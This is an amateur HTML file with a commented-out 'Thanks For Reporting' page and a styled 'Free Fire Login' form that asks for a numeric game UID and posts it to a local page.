<!--DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>contact</title>
  
  <link rel="stylesheet" href="style.css"></head>
  <body>
<h2 style="color: red;" style="margin: 26px auto;" style="background: red; " class="">Thanks For Reporting </h2><form action="index.html">
<button type="submit" value="back" class="abm">back</button>
</form>
</body>

</html--->

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Free Fire Login</title>
  <link rel="stylesheet" href="style.css">
  <style>
  .uid:hover{
    border: none;
    background-color: #3F2D2D;
    color: white;
    box-shadow: 
    10px 10px 40px #B456FF,
    10px 10px 40px #B456FF,
    10px 10px 40px #B456FF,
    10px 10px 40px #B456FF;
  }
    .uid {
      width: 100%;
      height: 40px;
      outline: none;
      border: solid;
      text-align: center;
      color: #000000;
      border-radius: 20px;
      font-size: 25px;
    }
    .uidb:hover{
      box-shadow:
      10px 10px 50px #04F,
      10px 10px 50px #04F,
      10px 10px 50px #04F,
      10px 10px 50px #04F;
      border
    }
    .uidb {
      width: 100%;
      background-color: #00C6FF;
      height: 37px;
      border: none;
      font-size: 22px;
      border-radius: 25px;
    }
  </style>
</head>
<body><center>
  <h1>UID Login</h1>
  <form action="x.html" method="post">
  <input placeholder="enter your uid" class="uid" required type="number" name="uid" id="uid" max="9999999999999" min="1111111">
  <br><br><br><br>
  
  
  <button onclick="m()" class="uidb" type="submit">Login</button>
  </form>
  <script src="main.js">
    alert('h');
    prompt('g', 'jrdj')
  </script>
</body>
</html>
